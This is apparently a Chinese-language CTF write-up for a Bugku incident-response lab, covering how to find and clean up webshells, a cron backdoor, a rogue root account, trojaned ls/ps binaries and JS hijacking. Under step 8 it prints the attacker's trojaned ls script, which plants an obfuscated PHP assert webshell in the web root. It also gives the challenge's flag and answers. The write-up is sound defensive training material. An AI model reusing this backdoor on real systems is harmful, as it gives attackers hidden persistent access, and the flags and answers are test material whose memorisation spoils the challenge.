bugku----应急加固1 WP

1.获取js劫持域名（带https）

https://www.194nb.com

2.黑客首次webshell 密码

导出/var/log/nginx中的日志
全局搜索POST

3.黑客首次攻击（非有效攻击）通过什么方式（如:文件上传、SQL注入、命令执行）

搜索恶意ip,发现是xss

4.请找到黑客留下的后门中黑客服务器的ip及端口

计划任务,刚开始getshell的时候是www-data用户,所以crontab -l -u www-data查看计划任务

5.提交黑客上传的第二个webshell内的flag

投机取巧法:

正常的其中一种做法:
在日志中搜索eval,发现有一个1.php

6.修复mysql可getshell漏洞

先找到mysql的配置文件

然后在secure-file-priv=后面填上null

重启mysql服务

7.找到黑客添加的账号并删除

发现一个用户有root特权

8.修复黑客篡改的命令并且删除篡改命令生成的免杀马

发现ls和正常的ls有很大不同
服务器ls(竖版)

正常ls(横版)

发现ls2是正常的,所以删除掉ls,然后把ls2替换回ls

#bin/bash
oldifs="$IFS"
IFS=$'\n'
result=$(ls2 $1 $2 $3)
for v in $result;
do
    echo -e "$v\t";
done
IFS="$oldifs"

echo "<?php \$aa="_GET";@array_map(implode('',['a','s','s','e','r','t']),\$\$aa);  //flag{5t945bbwxokj87f1ucjb2vc7zdnf8ix3}?>" > /var/www/html/public/static/img/1.php

然后删掉 /var/www/html/public/static/img/1.php就可以了
9.修复黑客篡改的命令2

ps和ps_可疑
rm -rf ps && mv ps_ ps

10.修复JS劫持

抓包发现可能的js劫持代码

然后回到服务器进行搜索

按dd删掉一整行